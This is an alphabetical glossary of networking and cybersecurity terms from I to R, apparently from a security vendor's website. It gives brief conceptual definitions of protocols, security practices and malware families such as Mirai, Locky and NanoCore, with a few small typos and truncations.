IP Passthrough - Use your own router behind the ISP-provided gateway. The signal is terminated (unlike bridge mode) at the gateway and allows the ISP to connect to the gateway with its own IP. Traffic will pass-though the gateway and the ISP-provided public IP address will be assigned to your router.

IPv4 - Internet Protocol version 4 (IPv4) defines an IP address as a 32-bit number. It is one of the core protocols of standards-based internetworking methods in the Internet and other packet-switched networks.

IPv6 - Internet Protocol version 6 (IPv6) defines an IP address as a 128-bit number. It is the most recent version of the Internet Protocol (IP), the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet.

IP Flood - This is a Denial of Service attack which aims to send a host an avalanche of pings (echo request packages) that the protocol implementation cannot manage. This causes a system to fail and send a denial of service error.

top page


J# - Set of programmming tools that allow developers to use the Java programming language to write applications that will run on Microsoft's .

J/Direct - Application programming interface (API) from Microsoft that allows applications written in the Java programming language to make programming requests for Windows operating system services.

J2EE - The Java Platform, Enterprise Edition (Java EE) is a collection of Java APIs owned by Oracle that software developers can use to write server-side applications.

J2ME - J2ME (Java 2 Platform, Micro Edition) is a technology that allows programmers to use the Java programming language and related tools to develop programs for mobile wireless information devices such as cellular phones and personal digital assistants (PDAs).

JAAS - The Java Authentication and Authorization Service (JAAS) is a set of application program interfaces (APIs) that can determine the identity of a user or computer attempting to run Java code, and ensure that the entity has the privilege or permission to execute the functions requested.

Jabber - Initiative to produce an open source, XML-based instant messaging platform.

Jack - A female connector is a connector attached to a wire, cable, or piece of hardware, having one or more recessed holes with electrical terminals inside, and constructed in such a way that a plug with exposed conductors (male connector) can be inserted snugly into it to ensure a reliable physical and electrical connection.

Jad - JAD (Joint Application Development) is a methodology that involves the client or end user in the design and development of an application, through a succession of collaborative workshops called JAD sessions.

Jailbreak - In a mobile device context, is the use of an exploit to remove manufacturer or carrier restrictions from a device such as an iPhone or iPad.

Jam - In an Ethernet network, a jam is a signal from one device to all other devices that a collision has occurred.

Jam Sync - In audio (sound) production, jam sync is a mode of device synchronization using SMPTE time code in which a slave device can furnish its own timing during the time that a master device is temporarily unstable.

Jamcracker Services Delivery Network JSDN - A platform for purchasing and managing public and private cloud computing services.

Janet - In the United Kingdom, JANET (Joint Academic Network) is the main backbone network for the UK university system of academic and research computers.

JAQL json query language - JAQL is a query language for the JavaScript Object Notation (JSON) data interchange format. -

JAR file Java Archive - A Java Archive, or JAR file, contains all of the various components that make up a self-contained, executable Java application, deployable Java applet or, most commonly, a Java library to which any Java Runtime Environment can link.

Jargon File New Hacker's Dictionary - The Jargon File is a compilation of computer-related slang that was first developed in 1975 by Raphael Finkel at Stanford University from sources including the Stanford and MIT AI Labs, Carnegie Mellon University and Worcester Polytechnic Institute.

Jitter - Jitter is any deviation in, or displacement of, the signal pulses in a high-frequency digital signal. The aberration can be in amplitude, phase timing, or the width of the signal pulse. Jitter is sometimes referred to as “Packet Delay Variation,” or PDV. Controlling jitter is critical for a good online experience.

Jump Bag - A Jump Bag is a container that has all the items necessary to respond to an incident inside to help mitigate the effects of delayed reactions.

top page


Kernel Level Rootkit - Kernel is the core of the Operating System and Kernel Level Rootkits are created by adding additional code or replacing portions of the core operating system, with modified code via device drivers (in Windows) or Loadable Kernel Modules (Linux). Kernel Level Rootkits can have a serious effect on the stability of the system if the kit’s code contains bugs. Kernel rootkits are difficult to detect because they have the same privileges of the Operating System, and therefore they can intercept or subvert operating system operations.

Keylogger - Software or hardware designed to capture a user's keystrokes on a compromised system. The keystrokes are stored or transmitted so that they may be used to collect valued information.

Keylogging - Through keylogging, cyber criminals can use malicious software to record the keystrokes on a users’s keyboard, without the victim realizing it. This way, cyber criminals can collect information such as passwords, usernames, PIN codes and other confidential data.

Key Management - The procedures and mechanisms for generating, disseminating, replacing, storing, archiving, and destroying cryptographic key.

Keystroke Interference Software - These programs attempt to trick keyloggers by introducing random keystrokes, although this simply results in the keylogger recording more information than it needs to. An attacker has the task of extracting the keystrokes of interest—the security of this mechanism, specifically how well it stands up to cryptanalysis, is unclear.

Keyword(s) - A word that acts as the key to a cipher or code. Phrases in web content that make it possible for people to find a website via search engines.

Keyword Stuffing - The practice of loading a webpage with keywords or numbers in an attempt to manipulate a site's ranking.

Kovter - Kovter is a Trojan whose primary objective is performing click-fraud operations on the PC it compromises. However, in 2015 Kovter incorporated new cloaking tricks in order to evade detection, which is why cyber criminals started using it to deliver other types of malware, such as ransomware, or to recruit PCs into botnets.

top page


Latency - Latency is the time it takes a frame to get from sender to destination. It is the sum of both processing and propagation delays when traveling through a network device or across the network and back to the test port. In order to measure latency a test frame is transmitted through the network containing a time stamp, and that time stamp is checked when the frame is received.

L2LP - Layer 2 Tunneling Protocol (L2TP) is a VPN technology used to establish secure connections over an insecure medium such as the Internet.

Least Privilege - The principle of giving an individual only the set of privileges that are essential to performing authorized tasks. This principle limits the damage that can result from the accidental, incorrect, or unauthorized use of an information system.

Level of Concern - This is the rating which indicates which protection tactics and processes should be applied to an information system to keep it safe and operating at an optimum level. A level of concern can be basic, medium or high.

Lightweight Directory Access Protocol - LDAP is an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network. Directory services play an important role in developing intranet and Internet applications by allowing the sharing of information about users, systems, networks, services, and applications throughout the network.

Likelihood of Occurrence - This defines the probability of a specific threats to exploit a given vulnerability, based on a subjective analysis.

Linux Hosting - A Linux server is a high-powered variant of the Linux open source operating system that's designed to handle the more demanding needs of business applications such as network and system administration, database management and Web services.

Live CD - A live CD is a complete bootable computer installation including operating system which runs directly from a CD-ROM or similar storage device into a computer's memory, rather than loading from a hard disk drive. A Live CD allows users to run an operating system for any purpose without installing it or making any changes to the computer's configuration. Live CDs can run on a computer without secondary storage, such as a hard disk drive, or with a corrupted hard disk drive or file system, allowing data recovery.

Local Area Network LAN - A local-area network (LAN) is a computer network that spans a relatively small area. Most often, a LAN is confined to a single room, building or group of buildings, however, one LAN can be connected to other LANs over any distance via telephone lines and radio waves.

Locky - Locky is a type of encrypting malware distributed through Microsoft Office Macros and targeting Windows-running PCs. The name comes from the fact that, once the victim’s PC is infected, the ransomware will scramble and encrypt all the data on that PC, setting every file extension to .locky. Locky is spread through spam email campaigns, which make heavy use of spoofing, the same as the cyber criminals behind Dridex operate. In order to get the data decrypted, Locky creators ask for a ransom, which, if not paid, will leave the data useless if the victim doesn’t have a backup.

Logic Bomb - This is a piece of code that a miscreant can insert into software to trigger a malicious function when a set of defined conditions are met.

Low Impact - This level of impact of a cyber threat or cyber attack on an organization shows that there could be a loss of confidentiality, integrity, or availability, but with limited consequences. This includes reducing the capabilities of the organization, while still retaining the ability to function, but also other minor damages, financial loss or harm to people.

top page


MAC - Media Access Control is a Layer 2 construct in the OSI model. The physicaladdress is coded into the network adapter itself and is designed to be unique.

Macro Virus - A macro virus is a computer virus written in the same macro language used for software programs, including Microsoft Excel or word processors such as Microsoft Word. When a macro virus infects a software application, it causes a sequence of actions to begin automatically when the application is opened.

Magic Cookie - A token or short packet of data passed between communicating programs, where the data is typically not meaningful to the recipient program. The contents are opaque and not usually interpreted until the recipient passes the cookie data back to the sender or perhaps another program at a later time. The cookie is often used like a ticket – to identify a particular event or transaction.

Malicious Code - Application security threat that cannot be efficiently controlled by conventional antivirus software alone. Malicious code describes a broad category of system security terms that includes attack scripts, viruses, worms, Trojan horses, backdoors and malicious active content.

Malware - Malicious software designed to infiltrate or damage a computer system, without the owner's consent. Common forms of malware include computer viruses, worms, Trojans, spyware, and adware.

Malware-as-a-Service - This type of malware is developed by cyber criminals to require little or no expertise in hacking, to be flexible, polymorphic, offer a broader reach and often comes packed with ready-coded targets. Malware-as-a-service can be bought or rented on the deep web and in cyber criminal communities, and sometimes can even include technical support from its makers and their team, which they run as a business.The main purpose behind it is making as much money as possible.

Management Security Control - A security control that focuses on the management of IT security and IT security risks.

Man-in-the-Middle Attack MitM - Through this attack, cyber criminals can change the victim’s web traffic and interpose themselves between the victim and a web-based service the victim is trying to reach. At that point, the attacker can either harvest the information that’s being transmitted via the web or alter it. This type of attack is often abbreviated to MITM, MitM, MIM, MiM or MITMA.

Mantrap - Mantraps prevent “piggybacking” or “tailgating” and ensure only authorized personnel pass through a security entrance one at a time.

Martian Packet - IP packet seen on the public Internet that contains a source or destination address that is reserved for special-use by Internet Assigned Numbers Authority (IANA). On the public Internet, such a packet either has a spoofed source address, and it cannot actually originate as claimed, or the packet cannot be delivered.

Maximum Tolerable Downtime - This refers to the maximum amount of time that organizational processes and activities can be disrupted without causing severe consequences for the organization’s mission.

Mazar BOT - Mazar BOT is a strain of malware targeting Android devices which first emerged in February 2016. The malware spreads through SMSs sent to random numbers, which include a link shortened through a URL shortner service (such as Once clicked, the link installs the Mazar BOT malware on the affected device, gaining the ability to write, send, receive and read SMS, access Internet connections, call phones, erase the phone it’s installed on and many more. Mazar BOT doesn’t run on smartphones running Android with the Russian language option. Spoofing has also been observed in Mazar BOT attacks.

MD5 - MD5 is a hashing algorithm that creates a fixed-length output, referred to as a hashor message digest. In the PKI world, SHA and MD5 are the most popular mechanisms for creating thumbprints for digital certificates.

Medical Identity Theft - The theft of personal information in order to obtain medical care, pharmaceutical services or even insurance coverage. As a result, erroneous entries may be placed into the victim's existing medical records and impact the health care or insurance coverage of the victim.

Metadata - Data about Data. Metadata is defined as the data providing information about one or more aspects of the data; it is used to summarize basic information about data which can make tracking and working with specific data easier. Metadata helps users find relevant information and discover resources. It also helps organize electronic resources, provide digital identification, and archive and preserve resources. Metadata allows users to access resources through "allowing resources to be found by relevant criteria, identifying resources, bringing similar resources together, distinguishing dissimilar resources, and giving location information." Metadata of telecommunication activities including Internet traffic is very widely collected by various national governmental organizations. This data is used for the purposes of traffic analysis and can be used for mass surveillance.

Micrsoft Forefront Endpoint Security - Microsoft Forefront Endpoint Security refers to an enterprise-grade line of security products offered by Microsoft in its security software product line. In 2012, Microsoft released the final version of Forefront Endpoint Security as "Microsoft System Center 2012 Endpoint Protection."

Microsoft Endpoint Essentials - Microsoft Security Essentials is a free anti-malware tool available for Microsoft's Windows Vista and Windows 7 operating systems that is designed to protect computers from viruses, spyware and other forms of malware.

Microsoft Security Software - Microsoft provides a variety of security options to protect users of its Windows-based operating systems and software products from malware, viruses, hacking attempts, phishing attacks, spam and more. The most popular among Microsoft's standalone software security options are Windows Defender, Microsoft Security Essentials, Microsoft Safety Scanner and Forefront Endpoint Security.

Mirai - Mirai is a malware botnet known to compromise Internet of Things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.

Mobile Code - This is a type of software that can be transferred between systems (across a network) and which can also be executed on a local system, such as a computer, without the recipient’s explicit consent. Here are some examples of mobile code that you may come across: JavaScript, VBScript, Flash animations, Shockwave movies, Java applets, ActiveX controls and even macros embedded in Microsoft Office or Excel documents.

Mobile Phone Malware - This type of malware targets mobile phones, tablets and other mobile devices, and it aims to disrupt their normal functions, cause system damage or data leakage and/or data loss.

Mobile Security - Mobile security involves protecting both personal and business information stored on and transmitted from smartphones, tablets, laptops and other mobile devices. The term mobile security is a broad one that covers everything from protecting mobile devices from malware threats to reducing risks and securing mobile devices and their data in the case of theft, unauthorized access or accidental loss of the mobile device.

Mobile Security Management - Mobile security management is a term that's often used interchangeably with the more common Mobile Device Management (MDM). Both terms refer to mobile security best practices and mobile security solutions that monitor, manage and secure the mobile devices used in an enterprise.

Moderate Impact - When this type of impact is estimated or observed on an information system, it means that confidentiality, integrity, or availability have suffered a significant blow. The organization may record barely working primary functions and significant damage to its assets, finances and individuals.

Multifactor Authentication - This type of authentication uses two or more factors to achieve authentication. These factors can include: something the users knows (a password or a PIN), something the user has (an authentication token, an SMS with a code or a code generator on the phone/tablet) and/or something the user is (biometric authentication methods, such as fingerprints or retina scans).

top page


Name Service Switch - The Name Service Switch (NSS) is a facility in Unix-like operating systems that provides a variety of sources for common configuration databases and name resolution mechanisms. These sources include local operating system files (such as /etc/passwd, /etc/group, and /etc/hosts), Domain Name System (DNS), Network Information Service (NIS), and LDAP.

NanoCore - NanoCore is a Remote Access Trojan spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

Nation-State Threat Actor - Government sponsored group that forcefully targets and gains illicit access to the networks of other governments or to industry groups to steal, damage, and/or change information.

Netiquette - Netiquette (short for network etiquette) is a collection of best practices and things to avoid when using the Internet, especially in communities such as forums or online groups. This is more of a set of social conventions that aim to make online interactions constructive, positive and useful. Examples include: posting off-topic, insulting people, sending or posting spam, etc.

Network Basic Input Output System NetBOIS - An API that augments the DOS BIOS by adding special functions for local-area networks (LANs). Almost all Windows-based LANs for PCs are based on the NetBIOS. Some LAN manufacturers have even extended it, adding additional networkcapabilities.

Network Information Service - The Network Information Service (NIS) is a client–server directory service protocol for distributing system configuration data such as user and host names between computers on a computer network.

Network Monitor - Network monitors (also known as reverse-firewalls) can be used to alert the user whenever an application attempts to make a network connection. This gives the user the chance to prevent the keylogger from "phoning home" with his or her typed information.

Network Monitoring - Network monitoring is the use of a system that constantly monitors a computer network for slow or failing components and that notifies the network administrator in case of outages or other trouble. Network monitoring is part of network management.

Network Security Zone - A networking environment with a well-defined boundary, a Network Security Zone Authority, and a standard level of weakness to network threats. Types of Zones are distinguished by security requirements for interfaces, traffic control, data protection, host configuration control, and network configuration control.

Network Sniffing - This is a technique that uses a software program to monitor and analyze network traffic. This can be used legitimately, to detect problems and keep an efficient data flow. But it can also be used maliciously, to harvest data that’s transmitted over a network.

.Net SQL Injection - SQL injection in .NET continues to be one of the most prevalent threats to websites and applications. A .NET SQL injection is a security weakness in a .NET application that lets hackers take control of the software’s database by tricking the application into sending unauthorized SQL commands.

Network Zone - A networking environment with a well-defined boundary, a Network Security Zone Authority, and a standard level of weakness to network threats. Types of Zones are distinguished by security requirements for interfaces, traffic control, data protection, host configuration control, and network configuration control.

Neutrino - Neutrino is a famous exploit kit which has been constantly evolving since it first appeared in 2013. This exploit kit rose to fame because of its user friendly features and low entry barrier to using it. Neutrino includes a user-friendly control panel, continuous monitoring of antivirus detection rates, infostealer capabilities, recommendations of which exploits to use and more. Neutrino is a tool often used to compromise PCs and deliver different types of malware, and is itself delivered through malvertising campaigns and web injects. Neutrino is also available through the exploit kit-as-a-service model, where attackers can rent the exploit kit and increase their profits with smaller investments.

NIDS - A network intrusion detection system (NIDS) is installed at the network level anddetects attacks at that level. Unlike a network-based intrusion prevention system(NIPS), an NIDS cannot stop an attack, but it can detect and report the attack to anadministrator so that appropriate actions can be taken.

NIPS - A network-based intrusion prevention system (NIPS) is a system used to monitor a network as well as protect the confidentiality, integrity, and availability of a network. Its main functions include protecting the network from threats, such as denial of service (DoS) and unauthorized usage.

Node - A connection point that can receive, create, store, or send data along distributed network routes. Each network node, whether it's an endpoint for data transmissions or a redistribution point, has either a programmed or engineered capability to recognize, process, and forward transmissions to other network nodes.

Non-Repudiation - This refers to a system’s ability to prove that a specific user (and that user alone) sent a message, and that the message hasn’t been modified in any way.

Novel - Is not known or not an obvious derivative of an existing way of doing things.

Nuclear Exploit Kit - Nuclear is a highly effective exploit kit which appeared in 2010 and gave cyber criminals the opportunity to exploit a wide range of software vulnerabilities in applications such as Flash, Silverlight, PDF reader, Internet Explorer and more. Polymorphic in nature, Nuclear advanced over the years into a notorious tool used for launching Zero Day attacks, spreading ransomware or for data exfiltration operations. Nuclear was often used in high-volume compromises and gave attackers the possibility to customize their attacks to specific locations and computer configurations. This constantly evolving exploit kit features various obfuscation tactics in order to avoid being detected by traditional anti-virus and anti-malware solutions.

top page


Obfuscation - In cyber security, obfuscation is a tactic used to make computer code obscure or unclear, so that humans or certain security programs (such as traditional antivirus) can’t understand it. By using obfuscated code, cyber criminals make it more difficult for cyber security specialists to read, analyze and reverse engineer their malware, preventing them for finding a way to block the malware and suppress the threat.

OCSP - The Online Certificate Status Protocol is an Internet protocol used for obtaining the revocation status of an X.509 digital certificate. It is described in RFC 6960 and is on the Internet standards track.

Offline Attack - This type of attack can happen when an attacker manages to gain access to data through offline means, such as eavesdropping, by penetrating a system and stealing confidential information or looking over someone’s shoulder and obtaining credentials to secret data.

On-Screen Keyboard - Most on-screen keyboards (such as the on-screen keyboard that comes with Windows XP) send normal keyboard event messages to the external target program to type text. Software key loggers can log these typed characters sent from one program to another.[46] Additionally, keylogging software can take screenshots of what is displayed on the screen (periodically, and/or upon each mouse click), which means that although certainly a useful security measure, an on-screen keyboard will not protect from all keyloggers.

One Time Passwords - Using one-time passwords may be keylogger-safe, as each password is invalidated as soon as it is used. This solution may be useful for someone using a public computer. However, an attacker who has remote control over such a computer can simply wait for the victim to enter his/her credentials before performing unauthorised transactions on their behalf while their session is active.

Open-Source Intelligence - Open-source intelligence is data collected from publicly available sources to be used in an intelligence context. In the intelligence community, the term "open" refers to overt, publicly available sources. It is not related to open-source software or collective intelligence.

OpenVPN - OpenVPN is a virtual private network system that implements techniques to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It implements both client and server applications.

Operational Security Control - A security control primarily implemented and executed by people and typically supported by the use of technology (e.g. supporting software).

Operation Tovar - Operation Tovar was an international, collaborative effort undertaken by law enforcement agencies and private security companies from multiple countries. The operation’s main objective was to take down the Zeus GameOver botnet, which was believed to be used for distributing the CryptoLocker ransomware. Heimdal Security was also involved in this effort, alongside the U.S. Department of Justice, Europol, the FBI, Microsoft, Symantec, Sophos, Trend Micro and more.

OSI Protocols - OSI protocols are a family of standards for information exchange. These were developed and designed by the International Organization of Standardization (ISO). In 1977 the ISO model was introduced, which consisted of seven different layers. This model has been criticized because of its technicality and limited features. The OSI protocol stack works on a hierarchical form, from the hardware physical layer to the software application layer. There are a total of seven layers. Data and information are received by each layer from an upper layer.

Outside Threat - This refers to an unauthorized person from outside the company’s security perimeter who has the capacity to harm an information system by destroying it, modifying or stealing data from it and disclosing it to unauthorized recipients, and/or causing denial of service.

Overwrite - To write or copy new data over existing data. The data that was overwritten cannot be retrieved.

top page


Packet Forwarding - Packet forwarding is the relaying of packets from one network segment to another by nodes in a computer network. The network layer in the OSI model is responsible for packet forwarding.

Packet Sniffer - This is a type of software designed to monitor and record traffic on a network. It can be used for good, to run diagnostic tests and troubleshoot potential problems. But it can also be used for malicious purposes, to snoop in on your private data exchanges. This includes: your web browsing history, your downloads, the people you send emails to, etc.

Parasite Hosting - Parasite hosting is a search engine optimization (SEO) technique that involves posting a free blog, wiki or forum on a highly respected domain with a high page rank. These free posts are used to create backlinks to a given site, which may boost that site’s search engine page rank, thanks to the host’s high rank.

Parasitic Viruses - A type of virus that’s capable of associating itself with a file or inserting itself into a file. To remain undetected, this virus will give control back to the software it infected. When the operating system looks at the infected software, it will continue to give it rights to run as usual. This means that the virus will be able to copy itself, install itself into memory or make other malicious changes to the infected PC. Although this type of virus appeared early on in the history of computer infections, it’s now making a comeback.

Passive Attack - This is a type of attack during which cyber criminals try to gain unauthorized access to confidential information. It’s called passive because the attacker only extracts information without changing the data, so it’s more difficult to detect as a result.

Password - Referred to as something you know. Passwords are the simplest form of authentication and are commonly used and fall under first-factor authentication.

Password Manager - A password manager assists in generating and retrieving complex passwords, potentially storing such passwords in an encrypted database or calculating them on demand.

Password Sniffing - This is a tactic used by cyber criminals to harvest passwords. They do this through monitoring and snooping in on network traffic to retrieve password data. If the password is sent over an unencrypted connection (for example, you put in a password on a website that isn’t protected by a security certificate – doesn’t start with https), it’s even easier for attackers to get their hands on your passwords.

Patch - A patch is a small software update released by manufacturers to fix or improve a software program. A patch can fix security vulnerabilities or other bugs, or enhance the software in terms of features, usability and performance.

Patch Management - This refers to the activity of getting, testing and installing software patches for a network and the systems in it. Patch management includes applying patches both for security purposes and for improving the software programs used in the network and the systems within it.

Patching - The act of applying a patch, which is designed to fix or enhance a software program. This includes both security-related updates and improvements in terms of software features and user experience.

Payload - In cyber security, the payload is the data cargo transported by a piece of malware onto the affected device or network. The payload contains the fundamental objective of the transmission, which is why the payload is actually the element of the malware that performs the malicious action (i.e. stealing financial information, destroying data, encrypting data on the affected device/network, etc.). When you consider a malware’s damaging consequences, that’s when you can talk about the payload.

Penetration - In cyber security, penetration occurs when a malicious attacker manages to bypass a system’s defenses and acquire confidential data from that system.

Penetration Testing - This is a type of attack launched a network or computer system in order to identify security vulnerabilities that can be used to gain unauthorized access to the network’s/system’s features and data. Penetration testing is used to help companies better protect themselves against cyber attacks.

Perimeter - The boundary between two network security zones through which traffic is routed.

Persistent Cookie - A persistent cookie is a data file capable of providing websites with user preferences, settings and information for future visits. Persistent cookies provide convenient and rapid access to familiar objects, which enhances the user experience.

Personal Firewall - This is a type of firewall that’s installed and runs on personal computers.A firewall is a network security system designed to prevent unauthorized access to public or private networks. Its purpose is to control incoming and outgoing communication based on a set of rules.

Personal Identifiable Information - Personally identifiable information (PII) is any information or data that can be used to discover or distinguish an individual's identity and specific details about the individual.

Phase-shift Keying - Phase-shift keying (PSK) is a digital modulation process which conveys data by changing (modulating) the phase of a constant frequency reference signal (the carrier wave). The modulation is accomplished by varying the sine and cosine inputs at a precise time. It is widely used for wireless LANs, RFID and Bluetooth communication.

Pharming - This is a type of online scam aimed at extracting information such as passwords, usernames and more from the victim. Pharming means redirecting Internet traffic from a legitimate website to a fake one, so victims can put in their confidential information and attackers can collect it. This type of attacks usually targets banking and ecommerce websites. What makes it difficult to detect is that, even if the victim types in the right URL, the redirect will still take the user to the fake website, operated by IT criminals.

Phishing - Phishing is a malicious technique used by cyber criminals to gather sensitive information (credit card data, usernames and passwords, etc.) from users. The attackers pretend to be a trustworthy entity to bait the victims into trusting them and revealing their confidential data. The data gathered through phishing can be used for financial theft, identity theft, to gain unauthorized access to the victim’s accounts or to accounts they have access to, to blackmail the victim and more.

Phishing Simulations - Phishing simulations involve a company sending internal phishing emails containing attachments, embedded links, and requests for personal information to its own employees. The phishing simulations are designed to look like they’re coming from a stranger or from someone the employee knows. If an employee takes the bait, they are notified and either educated or reprimanded.

Phreaking - Phreak is a slang term for hacking telephone networks and devices. It's a verb, as in "to phreak," or "phreaking." A person who phreaks is identified as a "phreak" or "phreaker." The word combines the words "freak" (meaning "aberration," or "enthusiast") and "phone." Usually, a phreak illegally manipulates a telephone system to make free calls, circumventing long-distance or international telephone fees. Phreaking began in the late 1950s with the advent of automated telephone switching.

Physical Penetration Testing - Physical Penetration Testing refers to identifying and exploiting the physical security of an organization in order to obtain valuable insights for correcting weaknesses in the company’s security programs and protocols. Physical security can be defined as protecting personnel, software, hardware, networks and data from physical actions and events that could result in loss or damage to an organization.

PKI - Public-key infrastructure is a system designed to control the distribution ofkeys and management of digital certificates.

Plaintext - In cryptography, plaintext usually means unencrypted information pending input into cryptographic algorithms, usually encryption algorithms. This usually refers to data that is transmitted or stored unencrypted.

Plain Old Telephone Service POST - Short for plain old telephone service, which refers to the standard telephone service that most homes use. In contrast, telephone services based on high-speed, digital communications lines, such as ISDN and FDDI, are not POTS. The main distinctions between POTS and non-POTS services are speed and bandwidth. POTS is generally restricted to about 52 Kbps (52,000 bitsper second).

Point of Presence - An access point, location, or facility at which two or more different networks or communication devices connect with each other and the Internet. Also referred to as PoP.

Polymorphic Code - Polymorphic code is capable of mutating and changing while maintaining the initial algorithm. Each time it runs, the code morphs, but keeps its function. This tactic is usually used by malware creators to keep their attacks covert and undetected by reactive security solutions.

Polymorphic Engine - A polymorphic engine is used to generate polymorphic malware. This is a computer program capable of transforming a program in derivative versions (different versions of code), but which perform the same function. Polymorphic engines rely on encryption and obfuscation to work, and are used almost exclusively by malware creators and other cyber criminals. Using this type of engine, malicious hackers can create malware types that can’t be detected by antivirus engines or have a very low detection rate.

Polymorphic Malware - Polymorphic malware is capable of transforming itself into various derivative versions that perform the same function and have the same objective. By using obfuscated code and constantly changing their code, polymorphic malware strains can infected information systems without being detected by solutions such as traditional malware, which is a key asset in the perspective of cyber criminals.

Polymorphic Packer - This is a software tool used for bundling up different types of malware in a single package (for example, in an email attachment). Malicious actors use polymorphic packers because they’re able to transform over time, so they can remain undetected by traditional security solutions for longer periods of time.

Pop-Up Ads - Pop-up ads are windows used in advertising. They appear on top of your browser window when you’re on a website, and they’re often annoying because they are intrusive. While they’re not malicious by nature, sometimes they can become infected with malware, if a cyber attacker compromises the advertising networks that’s serving the pop-up.

Port 443 - TCP port 443 is the standard TCP port that is used for website which use SSL. When you go to a website which uses the https at the beginning you are connecting to port 443.

Potential Impact - When a cyber security risk is assessed, the loss of the 3 essential factors is considered: confidentiality, integrity and availability. If a risk becomes a cyber attack, it can have low, moderate or high impact.

Potentially unwanted application PUA - There are applications you might install on your devices which contain adware, which may install toolbars or have confusing purposes. These applications can be non-malicious by nature, but they come with the risk of potentially becoming malicious. Users must seriously consider the risks before they install this type of applications.

Poweliks - Poweliks is a Trojan designed to perform click-fraud operations on the affected PC. Its specific character is given by the fact that it’s a type of fileless malware, which makes it very difficult to be detected by traditional, signature-based anti-malware and antivirus solutions. Poweliks installs itself in the Windows registry, where it can inject itself into essential Windows functions. This also helps Poweliks achieve persistence on the infected PC. This malware can be used to also download other threats onto the victim’s PC, such as ransomware delivered through malvertising.

Power Surge - Power surges happen when there is a massive spike in your electrical system's current. They only last about a fraction of a second, but can cause lifelong damages to any outlets or plugged-in appliances. This is due to the power surge overloading the circuits connected to your electrical system.

Power Virus - This type of computer virus is capable of executing a specific code that triggers the maximum CPU power dissipation (heat generated by the central processing units). Consequently, the computer’s cooling ability would be impaired and the virus could cause the system to overheat. One of the potential effects is permanent physical damage to the hardware. Power viruses are used both by good actors, to test components, but can also be used by cyber criminals.

Pre-Commercial - A product, technology or method that has not entered the marketplace yet.

Primary DNS - A primary DNS server is the first point of contact for a browser, application or device that needs to translate a human-readable hostname into an IP address. The primary DNS server contains a DNS record that has the correct IP address for the hostname.

Privileged Access Management PAM - Cybersecurity strategies and technologies for exerting control over the elevated (“privileged”) access and permissions for users, accounts, processes, and systems across an IT environment. By dialing in the appropriate level of privileged access controls, PAM helps organizations condense their organization’s attack surface, and prevent, or at least mitigate, the damage arising from external attacks as well as from insider malfeasance or negligence.

Privilege Escalation Attacks - Act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Procurement - Process of obtaining goods and services that includes the determination of requirements and acquisition from a supply system or by purchase from the trade.

Proof-of-Concept - Realization of a certain method or idea in order to demonstrate its feasibility, or a demonstration in principle with the aim of verifying that some concept or theory has practical potential.

Proprietary Information PROPIN - Proprietary information is made of all the data that is unique to a company and ensures its ability to stay competitive. This can include customer details, technical information, costs and trade secrets. If cyber criminals compromise or reveal this information, the impact on the company can be quite severe, as we’ve seen in major data breaches.

Protocol - Protocol, in computer science, a set of rules or procedures for transmitting data between electronic devices, such as computers. In order for computers to exchange information, there must be a preexisting agreement as to how the information will be structured and how each side will send and receive it.

Protocol Stack - The protocol stack or network stack is an implementation of a computer networking protocol suite or protocol family. Some of these terms are used interchangeably but strictly speaking, the suite is the definition of the communication protocols, and the stack is the software implementation of them.

Prototype - A first, typical or preliminary model of something, especially a machine, from which other forms are developed or copied.

Proposal - An offer, submitted in response to a request from a contracting authority, which constitutes a solution to the problem, requirement or objective in the request.

Proxy Server - A proxy server is a go-between a computer and the Internet. Proxies are used to enhance cyber safety because they prevent attackers from invading a computer/a private network directly.

Psychological Manipulation - Influence through mental distortion, emotional exploitation.

Pushdo - Pushdo is a botnet that has been active since 2007 and operates as a service for malware and spam distribution. Pushdo is known to distribute the Cutwail spambot. The malware uses encrypted communication channels and domain generation algorithms to send instructions to its zombie hosts.

top page


Qaz - W32.HLLW.Qaz.A was first discovered in China in July 2000. It is a companion virus that can spread over a network. It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597.

Quantum Computing - A quantum computer can process a vast number of calculations simultaneously. Whereas a classical computer works with ones and zeros, a quantum computer will have the advantage of using ones, zeros and “superpositions” of ones and zeros. Certain difficult tasks that have long been thought impossible for classical computers will be achieved quickly and efficiently by a quantum computer.

top page


Ransomware - A type of malware that denies a user's access to a system or data until a sum of money is paid.

Real-time Reaction - This is a type of immediate reaction and response to a spotted compromise attempt. This is done in due time so the victim can ensure protection against unauthorized network access.

Reconnaissance - Activity conducted by a threat actor to obtain information and identify vulnerabilities to facilitate future compromise(s).

Recursive DNS - A recursive DNS server is a domain name system server that takes website name or URL (uniform resource locator) requests from users and checks the records attained from authoritative DNS servers for the associated IP address.

Redaction - A form of data sanitization for selected data-file elements (not to be confused with media sanitization, which addresses all data on media).

Reflection Denial of Service - Reflection Denial of Service attacks makes use of a potentially legitimate third party component to send the attack traffic to a victim, ultimately hiding the attackers’ own identity. The attackers send packets to the reflector servers with a source IP address set to their victim’s IP therefore indirectly overwhelming the victim with the response packets.

Remote Access - This happens when someone uses a dedicated program to access a computer from a remote location. This is a norm for people who travel a lot and need access to their company’s network. But cyber criminals can also use remote access to control a computer they’ve previously hacked into.

Remote Access Trojan RAT - Remote Access Trojans (RATs) use the victim’s access permissions and infects computers to give cyber attackers unlimited access to the data on the PC. Cyber criminals can use RATs to exfiltrate confidential information. RATs include backdoors into the computer system and can enlist the PC into a botnet, while also spreading to other devices. Current RATs can bypass strong authentication and can access sensitive applications, which are later used to exfiltrate information to cyber criminal-controlled servers and websites.

Remote Desktop Protocol - Abbreviated as RDP, the Microsoft Remote Desktop Protocol is a multi-channel protocol that allows a user to connect to a computer running Microsoft Terminal Services. RDP is designed to support many different types of network topologies such as ISDN, POTS, and many LAN protocols such as IPX, NetBIOS, or TCP/IP.

Remote Diagnostics / Maintenance - This is a maintenance service carried on by authorized companies/individuals who use the Internet to communicate with the company’s network.

Remote Exploitation - Exploitation of a victim machine by sending specially crafted commands from a remote network to a service running on that machine to manipulate it for the purpose of gaining access or information.

